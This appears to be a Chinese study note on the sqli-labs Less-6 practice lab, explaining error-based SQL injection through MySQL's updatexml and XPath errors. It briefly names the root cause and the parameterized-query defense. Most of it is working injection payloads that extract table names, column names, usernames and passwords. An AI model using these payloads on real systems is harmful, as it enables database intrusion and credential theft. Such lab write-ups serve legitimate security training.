127.0.0.1/sqli/Less-6/?id=1
利用报错信息:页面会把 MySQL 的报错原文回显出来,因此查询结果可以随报错一起显示。根本原因是 id 参数被直接拼接进 SQL 语句;防御上应使用参数化查询,并且不要把数据库报错原文返回给客户端。
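固定格式: updatexml(a, XPath, b)
在 XML 文档 a 中,查找符合 XPath 表达式的节点,并用 b 替换其内容。当第二个参数不是合法的 XPath 表达式时(例如以 0x7e,即字符 “~” 开头),MySQL 会抛出 XPATH syntax error,并把该字符串原样带在报错信息里。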
concat(a,b,c,…) 用来连接括号内的字符串
Id=1’ union select Updatexml(1,concat(0x7e,b)
注入语句:
union select updatexml(1,concat(0x7e,(select database()),0x7e),1)
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’ ),0x7e),1)
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name=‘users’),0x7e),1)
and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) %23
and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) %23
127.0.0.1/sqli/Less-6/?id=1"
127.0.0.1/sqli/Less-6/?id=-1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = ‘security’ ),0x7e),1)
爆出数据库下的表名
and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = ‘security’ and table_name=‘users’),0x7e),1)%23
爆出users表里的字段
and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) %23
爆出账户名
and updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) %23
爆出密码